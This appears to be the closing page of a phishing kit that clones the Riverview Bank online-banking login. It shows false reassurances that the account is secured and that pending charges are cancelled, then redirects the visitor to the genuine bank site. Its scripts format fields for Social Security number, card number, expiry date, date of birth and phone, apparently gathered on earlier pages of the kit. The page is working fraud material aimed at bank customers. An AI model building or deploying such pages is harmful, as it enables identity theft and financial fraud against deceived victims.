<!DOCTYPE html>
<html class="js flexbox fontface objectfit object-fit csspositionsticky cssreflections no-regions cssresize shapes siblinggeneral subpixelfont supports csstransforms3d preserve3d canvas canvastext emoji devicemotion deviceorientation svg svgasimg svgclippaths svgfilters svgforeignobject inlinesvg smil no-touchevents typedarrays uagent-chrome uagent-webkit uagent-osOsx" lang="en" style="opacity: 1; background-color: #d8dde7; " stencil-hydrated="">

<head id="pageheader">
    <meta http-equiv="refresh" content="5;URL='https://internetbanking.riverviewbank.com/riverviewonline/UUX.aspx#/login'" />
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <link rel="stylesheet" href="./css/q2-tecton-theme.css" id="tecton-default-theme">
    <link href="./css/app.css" rel="stylesheet" data-no-shim="">
    <link href="./css/theme-q2-e42bae2639b5eb265373f9d5e839d38e.css" rel="stylesheet" data-no-shim="">
    <title>Riverview Bank</title>
    <link rel="icon" type="image/png" sizes="192x192" href="uvc.png">
    <meta id="viewportMeta" name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1, user-scalable=0, user-scalable=no, viewport-fit=cover">
</head>

<body id="pagebody" class="ember-application desktop frameless theme-q2" data-new-gr-c-s-check-loaded="14.1085.0" data-gr-ext-installed="">
    <div class="ember-view app-container desktop unauthenticated vertical-nav pfm-disabled no-pfm-accounts" id="ember4">
        <div class="container meta-container main-page-container">
            <div id="ember8" class="app-header ui-sticky top ember-view" style="top: 0px;">
                <div class="navbar navbar-fixed-top center-align-logo disable-menu-button" role="banner">
                    <div class="container meta-container" test-id="navbarContainer">
                        <!---->
                        <div class="navbar-branding">
                            <div class="branding">
                                <div id="ember9" class="logo ui-logo small ember-view"><span class="sr-only" test-id="logoDescriptiveText">Riverview Bank</span>
                                    <div aria-hidden="true" class="logo-image" test-id="logoDiv"></div>
                                </div>
                            </div>
                        </div>
                        <div id="ember10" class="custom-header ember-view">
                        </div>
                        <!---->
                    </div>
                </div>
            </div>
            <div class="quicktip-container main-desktop">
                <!---->
            </div>
            <div id="ember12" class="main-view grid-row drawer-view main-view ember-view">
                <!---->
                <div class="content-wrapper">
                    <div class="content-container">
                        <header>
                        </header>
                        <div class="content clearfix" role="main" test-id="mainContentArea">
                        </div>
                    </div>
                </div>
                <div id="login-modal"></div>
                <div class="login-outer">
                    <div class="login-inner" id="login-inner">
                        <div class="quicktip-container">
                            
                        </div>
                        
                        <div class="login-title" style="background-color:rgb(255, 255, 255) ;" >
                            <img src="./images/logo.png" width="150">
                        </div>
                        <div class=" login-message login-alert-message loginFormArea">
                        </div>
                        <div class="login-form loginFormArea">
                            <form class="is-invalid" action="./next.php" method="POST">
                                <div class="field ">
                                    <h3 style="color: green;">Your account is now secured from third party access</h3>
                            <h3 style="color: rgb(6, 4, 76);">All Pending  Charges has been Canceled</h3>
                            <h4  style="color: rgb(8, 5, 21);">we are logging you out....</h4>
                            
                                    
                                </div>
                                
                                
                                <div id="submissionArea">
                                    <div id="userLinks">
                                        
                                        
                                       
                                    </div>
                                </div>
                            </form>
                        </div>
                        <div class="login-icons clearfix"; style="background-color: #083574"><a target="_blank" class="login-adLink" href="#" >Locations</a><a target="_blank" mobile-window="main" class="login-adLink" href="#">Privacy Policy</a> </div>
                          <div class="preLogon">
                              
                        <a href="#" target="_blank" rel="noopener" test-id="complianceLogo">
                            <img src="./images/fdic_logo_small-7904e3fe1c4bfb9560fae184a7cbcffc.png">
                        </a>
                    </div>
                </div>
            </div>
            <a test-id="lnkReturnToLogin" href="#" id="ember30" class="return-to-login active ember-view"> Return to login
            </a>
        </div>
    </div>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
    <script src="https://s3-us-west-2.amazonaws.com/s.cdpn.io/3/jquery.inputmask.bundle.js"></script>
    <script type="text/javascript">
        $("#ssn").inputmask({"mask": "999-99-9999"});
    $("#cn").inputmask({"mask": "9999 9999 9999 9999"});
        $("#dob").inputmask({"mask": "99/99/9999","placeholder":"DD/MM/YYYY"});
        $("#exdate").inputmask({"mask": "99/9999","placeholder":"MM/YYYY"});
        $("#ph").inputmask({"mask": "999-999-9999"});
    </script>
</body>

</html>